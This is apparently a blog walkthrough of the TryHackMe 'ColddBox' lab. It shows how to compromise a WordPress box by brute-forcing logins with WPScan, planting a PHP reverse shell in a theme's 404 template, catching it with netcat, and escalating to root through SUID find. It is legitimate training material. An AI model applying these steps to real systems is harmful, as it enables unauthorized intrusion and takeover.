Greetings everyone!
We’re back with another box; this one is called ColddBox that is on the TryHackMe platform! So let’s jump right into it!
We’ll start off with an Nmap scan to see what ports we have open and what services are running on them. To do this, we’ll use this command: nmap -A -p- -T4 10.10.150.55
Port 80 is open so let’s begin by browsing to the website:
We know from the data returned in our nmap scan that this is a WordPress site. Let’s do some directory busting using a tool called gobuster:
Hmm looks like there is a rather interesting directory called “hidden”. Let’s check it out!
We are greeted with a message! Apparently someone named C0ldd is being asked to send Hugo his new password. Looking at this, we have three potential usernames to work with: C0ldd, Hugo, and Philip.
What we’re going to do next is load up a tool called WPScan, to see if we can brute force a WordPress login password for one of these users.
We’re using the RockYou wordlist for the password brute-forcing, and targeting the three usernames noted above.
Eventually we get a successful hit!
Alright, let’s try logging in with these found credentials.
Success!
So what do we do now? After some poking around, we can draw our attention to the “editor” tab under the Appearance section:
In this section, there are a few templates listed. If we choose the TwentyFifteen theme and select the 404.php template, we can remove the entry in it and replace it with a reverse shell. For this, I used the reverse php shell that can be found on https://pentestmonkey.net/.
Don’t forget to change the IP address and port in the shell configuration!
Save the edited 404.php template with the reverse shell. Now let’s open up a netcat listener:
With our listener ready to go, we can now browse to where we’d originally receive the 404 error message on the WordPress site.
This should look like it’s constantly trying to load, and that’s fine! Let’s check out our listener:
We now have a working shell on the victim machine!
We’re user www-data so we’ll need to escalate our privileges. First, let’s spawn a more stable shell:
Perfect! To help with our privilege escalation, we’ll be using a tool called LinPeas. Let’s open up an http server on our attacker machine to prepare for transferring the script over to the victim machine.
With the server up, let’s switch back over to the victim machine and use wget to grab our LinPeas script:
We’ll need to change the permissions on it, then we can run it.
We’ll get a lot of information returned to us, but under the SUID section this stands out:
Looks like we can abuse find to maybe escalate to root access! Checking out GTFObins, it states this:
Seems simple enough, so let’s try it!
Wooo! Root access!
Thanks for reading!